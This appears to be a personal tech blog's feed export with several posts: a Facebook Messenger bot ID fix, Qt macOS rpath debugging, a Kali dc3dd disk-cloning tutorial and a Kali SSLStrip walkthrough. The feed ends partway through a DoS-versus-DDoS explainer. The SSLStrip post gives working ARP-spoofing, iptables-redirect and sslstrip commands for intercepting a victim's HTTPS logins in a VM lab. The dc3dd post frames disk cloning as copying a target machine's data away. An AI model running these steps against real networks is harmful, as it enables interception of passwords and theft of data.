tag:blogger.com,1999:blog-34613794771397547152024-02-16T12:34:46.244+08:00Heron's NoteHeron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.comBlogger171125tag:blogger.com,1999:blog-3461379477139754715.post-74248825124037861242020-05-01T08:54:00.003+08:002020-05-01T08:54:33.204+08:00Moved to MediumI've moved to Medium <a href="http://blog.heron.me/">http://blog.heron.me/</a>. Please follow me there :)Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-22523432129064051512016-05-17T15:38:00.002+08:002016-05-17T15:38:12.880+08:00“(#100) No matching user found” - Facebook Messenger Bot BugOn May 13th, I found that my Facebook Messenger bot failed to response some users, and as I read the error log of my webhook process, then got something like:<br />
<pre><code>"error": {
"message": "(#100) No matching user found",
"type": "OAuthException",
"code": 100,
"fbtrace_id": “XXXXXXXXXXX”
}
</code></pre>
<h3 id="somebackgrounds">
Some Backgrounds</h3>
At this point, Facebook Messenger Bot is still new, which is reasonable to have some bugs. I’m using `<code>Node.js</code> for my webhook on <code>Heroku</code>, and I followed the tutorial provided by <a href="https://developers.facebook.com/docs/messenger-platform">Facebook for setting up the bot</a>.<br />
<h3 id="why">
Why?</h3>
Soon, I found this bug is discussed on Facebook Bug Page <a href="https://developers.facebook.com/bugs/578746852290927/?hc_location=ufi">here</a>. The problem is that Facebook decided to switch their encoding to use strings instead of ints for user & page IDs, which made the example code (template code) on Facebook official tutorial page fail to response users with string IDs.<br />
<h3 id="then">
Then?</h3>
Facebook send out notifications to the app developers saying:<br />
<blockquote>
On Tue May 17 format of user and page ids delivered via webhooks will change from an int to a string to better support default json encoder in js (that trims long ints). Please make sure your app works with string ids returned from webhooks as well as with ints.</blockquote>
<h3 id="solution">
Solution</h3>
I believe that Facebook will make the original code in the tutorial work pretty soon; however, there are people providing the solution online already. Here’s the template code that should work:<br />
<pre><code>var express = require('express');
var bodyParser = require('body-parser');
var request = require("request");
var app = express();
const JSONbig = require('json-bigint')
app.set('port', (process.env.PORT || 5000));
app.use(express.static(__dirname + '/public'));
app.use(bodyParser.text({ type: 'application/json' }))
app.listen(app.get('port'), function() {
console.log('Node app is running on port', app.get('port'));
});
var token = "<YOUR_TOEKN_HERE>";
function sendTextMessage(sender, text) {
messageData = {
text:text
}
request({
url: 'https://graph.facebook.com/v2.6/me/messages',
qs: {access_token:token},
method: 'POST',
json: {
recipient: {id:sender},
message: messageData,
}
}, function(error, response, body) {
if (error) {
console.log('Error sending message: ', error);
} else if (response.body.error) {
console.log('Error: ', response.body.error);
}
});
}
app.post('/webhook/', function (req, res) {
var data = JSONbig.parse(req.body);
messaging_events = data.entry[0].messaging;
for (i = 0; i < messaging_events.length; i++) {
event = data.entry[0].messaging[i];
sender = event.sender.id.toString();
if (event.message && event.message.text) {
text = event.message.text;
sendTextMessage(sender, text);
}
}
res.sendStatus(200);
});
</code></pre>
Make sure you’ve added <code>body-parser</code>, <code>express</code>, <code>json-bigint</code>, and <code>request</code> to your NPM.<br />
<h3 id="finally">
Finally</h3>
My Bot, Ducky, is now working well and be public, please feel free to message him here: <a href="http://m.me/ducky.bot">http://m.me/ducky.bot</a>!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://m.me/ducky.bot" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjydMhXQyXrw93dc9EcMjgeoDCMkBdqe_NybBT2-T9c0wb2rbZg1dUfjh4Gop6-37v3MDsb0hY0ZKu_rcjlCctirC0EfCOo6vfAu65vAMQ9mszGjgyZvTCOTxBDgu__y8o-AczlMLg0Grm3/s640/Screen+Shot+2016-05-17+at+3.36.45+PM.png" width="640" /></a></div>
<br />Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-21470932864737870132016-05-05T10:40:00.000+08:002016-05-05T10:46:33.419+08:00Qt Mac Application Failed to Create Self-contained App Bundle (Qt Creator Build)<p>Recently, I encountered a problem in creating an app bundle using Qt Creator with Qt 5.6, so I posted my question with detail on StackOverflow <a href="http://stackoverflow.com/questions/36939094/qt-mac-application-failed-to-do-static-linking-development-qt-creator-build/37028995#36939094">here</a>.</p>
<p>In this post, I am going to point out the places I got wrong, and some studies.</p>
<h3 id="scott">Scott</h3>
<p><a href="http://stackoverflow.com/users/676030/scottt">Scott</a> is a friend of mine for years, and he is best programmer I’ve ever met in Taiwan. He helped me on this question, and I would like to quote his words here:</p>
<blockquote>Do try to figure out what you did wrong before. Look at the RPATH, install names etc in your executable and update your StackOverflow question with those findings.
Finding out what you did wrong is an important step in understanding a system. This makes your exercise of publishing apps on multiple platforms more meaningful.
</blockquote>
<h3 id="executable_pathloader_pathrpath">@executable_path, @loader_path, @rpath</h3>
<p>The first reason I couldn’t build the app build is that I didn’t fully understand the path names used on Mac, and here is my study of @executable_path, @loader_path, and @rpath.</p>
<ul>
<li><code>@executable_path</code>: the folder path of application’s executable
<ul>
<li>ex. <code>/Applications/Foo.app/Contents/MacOS</code></li>
<li>useful for <em>frameworks embedded inside the applications</em></li>
</ul></li>
<li><code>@loader_path</code>: the folder path of the related plug-in’s code
<ul>
<li>ex. <code>/Library/Application Support/Foo/Plug-Ins/Bar.bundle/Contents/MacOS</code></li>
<li>useful for <em>frameworks embedded inside plug-ins</em></li>
<li>availabe from Mac OS X 10.4</li>
</ul></li>
<li><code>@rpath</code>: instructs the dynamic linker to search a list of paths in order to locate the framework
<ul>
<li>no need to specify the “install path” using either <code>@executable_path</code> or <code>@loader_pat</code>h, but pass additional flags when building the host application (ex. -rpath @excutable/…/Frameworks or /Library/Frameworks)</li>
<li>availabe from Mac OS X 10.5</li>
</ul></li>
</ul>
<h3 id="otool">otool</h3>
<p>The second reason I was stuck is that <code>otool</code> didn’t resolve <code>@rpath</code> names, so I was confused when it always returned me the same thing.</p>
<p>However, Scott wrote another version of otool that resolves the rpaths <a href="https://github.com/scottt/scottt-bin/blob/master/otool-rpath">here</a>. Here are the steps that demostrate the difference:</p>
<pre><code>> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
@rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)
> otool-rpath bibi.app/Contents/MacOS/bibi
/Users/heron/Qt/5.6/clang_64/lib
> macdeployqt ./*.app -verbose=3 -always-overwrite -appstore-compliant
> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
@rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)
> otool-rpath bibi.app/Contents/MacOS/bibi
@executable_path/../Frameworks
</code></pre>
<h3 id="macdeployqt">macdeployqt</h3>
<p>The last reason I failed to understand what’s going on is the output of <code>macdeployqt</code>, which confused me.</p>
<pre><code>> macdeployqt bibi.app
File exists, skip copy: "bibi.app/Contents/PlugIns/platforms/libqcocoa.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/printsupport/libcocoaprintersupport.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqdds.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqgif.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqicns.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqico.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqjpeg.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtga.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtiff.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwbmp.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwebp.dylib"
WARNING:
WARNING: "bibi.app/Contents/Resources/qt.conf" already exists, will not overwrite.
WARNING: To make sure the plugins are loaded from the correct location,
WARNING: please make sure qt.conf contains the following lines:
WARNING: [Paths]
WARNING: Plugins = PlugIns
</code></pre>
<p>However, in Scott’s solution, he gave following additional arguments:</p>
<ul>
<li><b>-verbose=3</b>: see how the rpaths are updated in details (<a href="https://gist.github.com/scottt/1d5a12788de97ea93255d25a0c14080e">Scott’s log</a>)</li>
<li><b>always-overwrite</b>: copy files even if the target file exists, so the first (Scott: I used “always-overwrite” to get predictable results after repeated testing, since the Qt frameworks would be copied into the app bundle.)</li>
<li><b>appstore-compliant</b>: skip deployment of components that use private API (Scott: appstore-compliant was just for your convenience)</li>
</ul>
<h3 id="test">Test</h3>
<p>Testing is one additional thing the made the original question harder to be solved: there’s no easy way to see if my app bundle works on the other machine without Qt installed.</p>
<p>Instead of asking friends to run the app, Scott mentioned that we can use `<code>lsof</code> at run-time.</p>
<pre><code>> ps aux|grep bibi
heron 21610 0.0 0.5 2632680 40272 ?? S Tue09PM 5:32.80 /Users/heron/Project/bibi/bibi/build-bibi-Desktop_Qt_5_6_0_clang_64bit-Release/bibi.app/Contents/MacOS/bibi
heron 39245 0.0 0.0 2434840 664 s003 R+ 9:31AM 0:00.00 grep --color=auto bibi
> lsof -p 39183 | grep QtCore
bibi 21610 heron txt REG 1,4 6441676 168354669 /Users/heron/Qt-free/5.6/clang_64/lib/QtCore.framework/Versions/5/QtCore
</code></pre>
<p>After <code>macdeployqt</code>, the app bundle no longer needs to link to frameworks outside the bundle:</p>
<pre><code>> ps aux|grep bibi
heron 39352 0.0 0.0 2435864 788 s003 S+ 9:32AM 0:00.00 grep --color=auto bibi
heron 39315 0.0 0.8 2611176 63000 ?? S 9:32AM 0:00.68 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/MacOS/bibi
> lsof -p 39315 | grep QtCore
bibi 39315 heron txt REG 1,4 6017532 171823963 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/Frameworks/QtCore.framework/Versions/5/QtCore
</code></pre>
<h3 id="summary">Summary</h3>
<p>I would say the biggest problem is that I didn’t know how to read <code>@rpath</code>, so Scott’s <code>otool-rpath</code> or <code>lsof</code> helps eventually.</p>
<h3 id="reference">Reference</h3>
<ul>
<li><a href="https://wincent.com/wiki/@executable_path,_@load_path_and_@rpath">@executable_path, @load_path, and @rpath</a></li>
</ul>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-17827325623408773172016-04-10T13:45:00.000+08:002016-04-10T13:45:00.282+08:00Kali Tool Series - dc3dd<p>“dc3dd is a patched version of GNU dd with added features for computer forensics” - from <a href="http://www.forensicswiki.org/wiki/Dc3dd">ForensicsWiki</a>.</p>
<h3 id="comparisontognudd">Comparison to GNU dd</h3>
<p>While I was using <code>dd</code>, I found it’s hard to know how long will it take, and if the cloning was done completely without error. However, <code>dc3dd</code> fixes all these problems by providing:</p>
<ul>
<li>on the fly hashing with multiple algorithms (MD5, SHA–1, SHA–256, and SHA–512)</li>
<li>progress reports</li>
<li>writing errors directly to a file</li>
</ul>
<h3 id="whenandwhyusingddordc3dd">When and Why using <code>dd</code> or <code>dc3dd</code></h3>
<p>In the movies or TV series, we can see hackers plugin a USB disk then copy all the data out of the machine, and that’s the case we can use <code>dd</code> or <code>dc3dd</code>.</p>
<p>To be more specific, the flow is:</p>
<ul>
<li>insert a Kali live usb disk into the target machine</li>
<li>do the Kali Forensics Boot</li>
<li><code>dd</code> or <code>dc3dd</code> the disk of the target machine into a file on the Kali USB disk or another USB disk</li>
</ul>
<h3 id="usage">Usage</h3>
<p>I use VMs, so I won’t have the target machine in this example. However, you can pretend the disk I am going to clone (<code>/dev/sda5</code>) is the disk of the target machine. And, I am cloning the disk into a file stored in another USB disk.</p>
<p>First of all, list out the partitions of all the disks.</p>
<pre><code>> fdisk -l
Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x7b852532
Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 40136703 40134656 19.1G 83 Linux
/dev/sda2 40138750 41940991 1802242 880M 5 Extended
/dev/sda5 40138752 41940991 1802240 880M 82 Linux swap / Solaris
Disk /dev/sdb: 3.8 GiB, 4026531840 bytes, 7864320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x893a988d
Device Boot Start End Sectors Size Id Type
/dev/sdb1 976 7864319 7863344 3.8G b W95 FAT32
</code></pre>
<p>Pick the one you want to clone later, and here I am using the Linux swap (<code>/dev/sda5</code>), which is kind of meaningless but enough for practice purpose.</p>
<p>Then, locate the place you want to save your cloned disk image. Usually, you would want to use another USB disk since the machine may not belong to you, and what you want to do is to clone the disk, save in the USB disk, then take away. I will save the file on the <code>/dev/sdb</code> disk, which is mounted at <code>/media/root/0909-B70D/disk-img/</code>.</p>
<p>Start <code>dc3dd</code>:</p>
<pre><code>> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed), 922,746,880 bytes
sector size: 512 bytes (probed)
261455872 bytes ( 249 M ) copied ( 28% ), 33 s, 7.6 M/s
</code></pre>
<ul>
<li><code>if</code>: input disk location</li>
<li><code>of</code>: output image location</li>
<li><code>hash</code>: calculate the hash on the fly</li>
</ul>
<h3 id="verification">Verification</h3>
<p>After the cloning is completed, we can check if the file looks exactly the same as the original by comparing the hash code:</p>
<pre><code>> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed), 922,746,880 bytes
sector size: 512 bytes (probed)
922746880 bytes ( 880 M ) copied ( 100% ), 236 s, 3.7 M/s
input results for device `/dev/sda5':
1802240 sectors in
0 bad sectors replaced by zeros
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f (sha256)
output results for file `/media/root/0909-B70D/disk-img/cloned':
1802240 sectors out
dc3dd completed at 2016-04-10 13:00:45 +0800
> file /media/root/0909-B70D/disk-img/cloned
/media/root/0909-B70D/disk-img/cloned: Linux/i386 swap file (new style), version 1 (4K pages), size 225279 pages, no label, UUID=767f785e-d7fb-4b3c-9f8e-b02761db620e
> sha256sum /media/root/0909-B70D/disk-img/cloned
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f /media/root/0909-B70D/disk-img/cloned
</code></pre>
<p>As you can see, the swap file is copied, and the hashs are the same (f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f).</p>
<h3 id="kaliforensicsboot">Kali Forensics Boot</h3>
<p>By doing the Kali Forensics Boot, one can gain lots of benefits from being silent. That is, the Kali Forensics Boot provides following features:</p>
<ul>
<li>the internal hard disk is never touched</li>
<li>auto-mounting of removable media is disabled</li>
</ul>
<h3 id="reference">Reference</h3>
<ul>
<li><a href="https://linhost.info/2012/07/copy-and-restore-a-drive-with-dc3dd-gzip-and-a-network-share/">Copy and Restore a Drive with Dc3dd, Gzip and a Network Share</a></li>
<li><a href="http://docs.kali.org/general-use/kali-linux-forensics-mode">Kali Linux Forensics Mode</a></li>
</ul>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-60747243539479559562016-04-06T15:52:00.000+08:002016-04-06T15:55:39.294+08:00Kali Tool Series - SSLStripRefer to <a href="http://security.stackexchange.com/questions/41988/how-does-sslstrip-work">“How does SSLstrip work?” on StackExchange</a>: SSLStrip is a type of MitM attack that forces a victim’s browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip is “stripping” <code>https://</code> URLs and turning them into <code>http://</code> URLs.<br />
<pre><code>> sslstrip -h
sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>
Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.
</code></pre>
<h3 id="overview">
Overview</h3>
We will use ARP Spoofing in order to obtain the victim’s traffic, which means that the traffic will go through our Kali machine then pass back to the victim or the server he/she is communicating with. Then, we will be listening on port 80, the basic HTTP protocol port. All the traffic of port 80 will be routed to SSLStrip, and SSLStrip will handle rest of the HTTPS traffics.<br />
The expected results was that the attacker will be able to read the requests between the victim and the HTTPS websites he/she is visiting, which may contains valuable cookies or passwords. However, in my experiment, SSLStrip crashed, and it’s seems that this method is out of date.<br />
<h3 id="findthegatewayip">
Find the Gateway IP</h3>
<pre><code>> route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
0.0.0.0 192.168.63.2 0.0.0.0 UG 1024 0 0 eth0
192.168.63.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
192.168.63.2 0.0.0.0 255.255.255.255 UH 1024 0 0 eth0
</code></pre>
or,<br />
<pre><code>> netstat -nr
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
192.168.63.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
</code></pre>
So, the Gateway IP is <strong>192.168.63.2</strong> in my case.<br />
<h3 id="findthevictimip">
Find the Victim IP</h3>
As I run Kali in VM, I will let the victim be a Ubuntu server, which is also another VM on my machine. I run this on my Ubuntu:<br />
<pre><code>> ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:4f:5f:5b
inet addr:192.168.63.152 Bcast:192.168.63.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe4f:5f5b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:118 errors:0 dropped:0 overruns:0 frame:0
TX packets:81 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15530 (15.5 KB) TX bytes:14538 (14.5 KB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:16 errors:0 dropped:0 overruns:0 frame:0
TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1184 (1.1 KB) TX bytes:1184 (1.1 KB)
</code></pre>
That is, the victim IP is <strong>192.168.63.152</strong>. If you have no access of the victim machine, you can use commands like <code>nmap -sP 192.168.63.0/24</code> to search.<br />
<h3 id="iprouting">
IP Routing</h3>
We are going to redirect Kali’s inbound traffic from 80 to the port SSLStrip is running on (let’s use 5050 here).<br />
<pre><code>iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5050
</code></pre>
To check if the routing rule is set:<br />
<pre><code>> iptables -L -vt nat
Chain PREROUTING (policy ACCEPT 100 packets, 13501 bytes)
pkts bytes target prot opt in out source destination
16 960 REDIRECT tcp -- any any anywhere anywhere tcp dpt:http redir ports 5050
…
</code></pre>
If you want to clean up some mess and reset, here’s the way to clear all PREROUTING rules:<br />
<pre><code>for i in $( iptables -t nat --line-numbers -L | grep ^[0-9] | awk '{ print $1 }' | tac ); do iptables -t nat -D PREROUTING $i; done
</code></pre>
<h3 id="ipforwarding">
IP Forwarding</h3>
Since we are going to issue ARP Spoofing later, we have to enable IP forwarding first. So, whenever the Kali machine recieves packages, it will send them to the proper destination. We call this MitM (Man in the Middle).<br />
<pre><code>> echo 1 > /proc/sys/net/ipv4/ip_forward
> cat /proc/sys/net/ipv4/ip_forward # check
1
</code></pre>
<h3 id="arpsproof">
ARP Sproof</h3>
Now, in order to let the traffic flow through our Kali machine (Mitm), we need ARP Sproof. The syntax is:<br />
<pre><code>> arpspoof -i interface -t target_IP -r gateway_IP
</code></pre>
In our case:<br />
<pre><code>> arpspoof -i eth0 -t 192.168.63.152 -r 192.168.63.2
0:c:29:80:9a:85 0:50:56:e9:3:c 0806 42: arp reply 192.168.63.156 is-at 0:c:29:5a:28:9e
0:c:29:80:9a:85 0:c:29:5a:28:9e 0806 42: arp reply 192.168.63.2 is-at 0:50:56:e9:3:c
…
</code></pre>
The process is blocking, and we should keep it running.<br />
<h3 id="sslstrip">
SSLStrip</h3>
Start SSLStrip on port 5050 (or any port you like, just make sure that matches the one we used in IP Routing).<br />
<pre><code>> sslstrip -l 5050
sslstrip 0.9 by Moxie Marlinspike running...
</code></pre>
<h3 id="victimbrowsehttpswebsites">
Victim Browse HTTPS Websites</h3>
Since my victim only has Command Line Interface, so I am using <em>lynx</em> as my browser.<br />
<pre><code>> lynx http://www.paypal.com
</code></pre>
On Kali’s Wireshark, we can tell that ARP Spoofing is working because all duplicated packages are shown. (In the screenshot, the upper part happened when ARP Spoofing was off, and all the traffics looks normal. The lower part happened when ARP Spoofing was on, we can see that Kali recieved all the traffic to/from victim, 192.168.63.152, then passed through.)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfbfoZZAEoylKlmK7rZZppfIBSc79cqSFTLO0405LTumjMfgyYQcVuNjkTDdqfgf7zDD6i_Z1T_P0fnX6GWiu3MqhMVvc6FnNh-Sd1as2X9l3EWKcrG3aOaMvwKvWX_caAn71iAfGC6Ti/s1600/Screen+Shot+2016-04-06+at+3.12.37+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="364" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjfbfoZZAEoylKlmK7rZZppfIBSc79cqSFTLO0405LTumjMfgyYQcVuNjkTDdqfgf7zDD6i_Z1T_P0fnX6GWiu3MqhMVvc6FnNh-Sd1as2X9l3EWKcrG3aOaMvwKvWX_caAn71iAfGC6Ti/s640/Screen+Shot+2016-04-06+at+3.12.37+PM.png" width="640" /></a></div>
<br />
<h3 id="sslstripresult">
SSLStrip Result</h3>
SSLStrip crashed right after the user is about to connect the HTTPS website. I’ve tried to get the latest SSLStrip 0.9.2, but it crashes in the same way. And, I also found the other users are suffering from this issue as well: <a href="https://github.com/moxie0/sslstrip/issues/17">sslstrip on non hsts site error #17</a> and <a href="https://github.com/moxie0/sslstrip/issues/15">Execptions in twisted #15</a>.<br />
There’s the error:<br />
<pre><code>sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
File "sslstrip.py", line 105, in main
reactor.run()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1192, in run
self.mainLoop()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1204, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.7/dist-packages/twisted/internet/epollreactor.py", line 396, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 88, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 73, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 627, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
selectable.connectionLost(f)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 484, in connectionLost
self._commonConnection.connectionLost(self, reason)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 298, in connectionLost
protocol.connectionLost(reason)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 474, in connectionLost
self.handleResponseEnd()
File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 119, in handleResponseEnd
HTTPClient.handleResponseEnd(self)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 485, in handleResponseEnd
self.handleResponse(b)
File "/root/sslstrip-0.9.2/src/sslstrip/ServerConnection.py", line 133, in handleResponse
self.client.write(data)
File "/usr/lib/python2.7/dist-packages/twisted/web/http.py", line 962, in write
raise RuntimeError('Request.write called on a request after '
exceptions.RuntimeError: Request.write called on a request after Request.finish was called.
</code></pre>
The experiment didn’t work, and I may come back to this if I found something new.<br />
<h3 id="reference">
Reference</h3>
<ul>
<li><a href="https://www.cybrary.it/0p3n/using-sslstrip-in-kali-linux/">Using SSLStrip in Kali Linux</a></li>
<li><a href="http://tools.kali.org/information-gathering/sslstrip">Kali Tools - sslstrip</a></li>
<li><a href="http://security.stackexchange.com/questions/41988/how-does-sslstrip-work">“How does SSLstrip work?” on StackExchange</a></li>
<li><a href="http://lubos.rendek.org/remove-all-iptables-prerouting-nat-rules/">Remove All Iptables PREROUTING Nat Rules</a></li>
</ul>
Heron Yanghttp://www.blogger.com/profile/13927972839081766610noreply@blogger.com0tag:blogger.com,1999:blog-3461379477139754715.post-57367144716170124992016-04-06T10:58:00.000+08:002016-04-06T13:14:48.156+08:00DoS v.s. DDoS<p>People like to mix up DoS with DDos, which are similiar but different. By refering to <a href="https://en.wikipedia.org/wiki/Denial-of-service_attack">Wikipedia</a>, we got:</p>
<p><strong>DoS</strong>: A denial-of-service (DoS) attack is an attempt to make a machine or network resource unavailable to its intended users, such as to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet.</p>
<p><strong>DDoS</strong>: A distributed denial-of-service (DDoS) is where the attack source is more than one, often thousands of, unique IP addresses.</p>
<h3 id="difference">Difference</h3>
<p>DoS is launched by <strong>one machine</strong>; on the contrast, DDoS is launched by <strong>distributed machines</strong>.</p>
<p>Refer to <a href="http://www.webopedia.com/TERM/D/DDoS_attack.html">DDoS attack - Distributed Denial of Service</a>, we got: “A Denial of Service (DoS) attack is different from a DDoS attack. The DoS attack typically uses one computer and one Internet connection to flood a targeted system or resource. The DDoS attack uses multiple computers and Internet connections to flood the targeted resource. DDoS attacks are often global attacks, distributed via botnets.”</p>
<h3 id="whomixedthemup">Who Mixed Them Up?</h3>
<p>I’ve been seeing this mistake for a long time, people keep mixing up these two names. If the attack was only launched on one machine, then it’s called DoS instead of DDoS. Some examples of people who got it wrong here:</p>
<ul>
<li><a href="http://null-byte.wonderhowto.com/how-to/become-elite-hacker-part-3-easy-ddos-0147212/">How to Become an Elite Hacker, Part 3: Easy DDOS</a></li>
<li><a href="http://www.mightyshouts.com/ddos-attack/">How to Perform a DDOS Attack on Wireless Access Point</a></li>
<li><a href="http://blognyajohny.blogspot.tw/2014/04/ddos-attack-using-hping-command-in-kali.html">DDoS attack using hping Command in Kali Linux</a></li>
</ul>
<h3 id="whythismatters">Why This Matters?</h3>
<p>DoS is easy to launch, and easy to be defended. On the other hand, DDoS is always a big threat in current world since victims have a difficult time distinguishing the bad guys from the large amount of users. DDoS is a serious problem that we should be focus on (see <a href="http://www.digitalattackmap.com/understanding-ddos/">Digital Attack Map hosted by Google</a>); and those who claim what they were doing were DDoS attacks but actually DoS attacks should stop delivering wrong information to the public.</p>
<h3 id="howtolaunchddosthen">How To Launch DDoS Then?</h3>
<p>Too bad, I’ve never launched a DDoS attack before, which I believe it’s illegal as well. However, followings are the information about it if you’re interested in knowing more. And, <strong>one should NOT apply them on real machines/networks unless he/she fully understand the consequences</strong>.</p>
<p>First of all, you need a BotNet, or a distributed machines under your control. Bad guys buy the BotNet on Black Market. Those machines are usually the ones had been hacked, so attackers can control them via the backdoor left on the machine.</p>
